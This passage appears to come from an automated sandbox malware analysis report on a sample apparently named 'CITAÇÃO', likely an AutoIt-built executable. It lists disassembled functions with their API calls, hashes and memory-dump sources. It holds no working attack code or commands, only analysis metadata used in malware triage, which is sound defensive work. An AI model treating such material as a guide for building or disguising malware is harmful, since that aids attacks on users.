                                                      • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                      Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0043392E
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • __wsplitpath.LIBCMT ref: 00433950
                                                      • __wcsicoll.LIBCMT ref: 00433974
                                                      • __wcsicoll.LIBCMT ref: 0043398A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                      • String ID:
                                                      • API String ID: 1187119602-0
                                                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                      Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1597257046-0
                                                      • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                      • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                      Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                      • String ID:
                                                      • API String ID: 237123855-0
                                                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                      Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyObject$IconWindow
                                                      • String ID:
                                                      • API String ID: 3349847261-0
                                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                      Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                      • String ID:
                                                      • API String ID: 2223660684-0
                                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                      Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                                      • EndPath.GDI32(?), ref: 00447336
                                                      • StrokePath.GDI32(?), ref: 00447344
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 2783949968-0
                                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                      Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                      Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                      • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                      • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                      • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                      Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00472B63
                                                      • GetDC.USER32(00000000), ref: 00472B6C
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                      Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00472BB2
                                                      • GetDC.USER32(00000000), ref: 00472BBB
                                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                      Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd_noexit.LIBCMT ref: 00415150
                                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                      • __freeptd.LIBCMT ref: 0041516B
                                                      • ExitThread.KERNEL32 ref: 00415173
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1454798553-0
                                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                      Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _strncmp
                                                      • String ID: Q\E
                                                      • API String ID: 909875538-2189900498
                                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                      Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 2652923123-3941886329
                                                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                      Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strncmp
                                                      • String ID: U$\
                                                      • API String ID: 2666721431-100911408
                                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
